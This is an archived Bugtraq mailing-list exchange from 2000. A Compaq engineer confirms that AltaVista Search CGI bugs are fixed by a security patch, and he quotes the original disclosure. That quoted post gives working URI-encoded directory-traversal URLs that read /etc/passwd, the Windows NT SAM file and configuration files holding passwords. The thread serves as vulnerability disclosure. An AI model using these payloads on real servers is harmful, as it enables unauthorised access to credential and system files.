Hi Rudi, Just tried to reproduce the bugs you were talking about, and I can confirm that they exist without their secpatch and that they are gone after having installed the secpatch. Guy ROELANDTS Compaq EMEA > -----Original Message----- > From: rudi carell [mailto:rudicarellat_private] > Sent: Sunday, January 09, 2000 4:37 PM > To: BUGTRAQat_private > Subject: Altavista followup > > > hola, > > more bugs in the AV-Search thing .. > > using uri-encoded strings it is possible to view "any" file > on the system .. > > examples: > > unixxxsss ... > http://server:[port]/cgi-bin/query?mss=%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f/ etc/passwd or on an micro$oft IIS ... http://server:[port]/cgi-bin/query?mss=%2e%2e%2f%2e%2e%2f%2e%2e%2f\\winnt\\r epair\\sam._ interesting infos about the file structure ... http://server:[port]/cgi-bin/query?mss=%2e%2e%2f%2e%2e%2findex/intranet/inde xer.log or another file which does contain the password .. http://server:[port]/cgi-bin/query?mss=%2e%2e%2f%2e%2e%2findex/intranet/poli cy.conf altavista told me that this is(was) just a flavour of the "old" bug and its fix is(was) included in the last secpatch. whatever .... nicedays :-/ RC rudicarellat_private
This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 15:27:28 PDT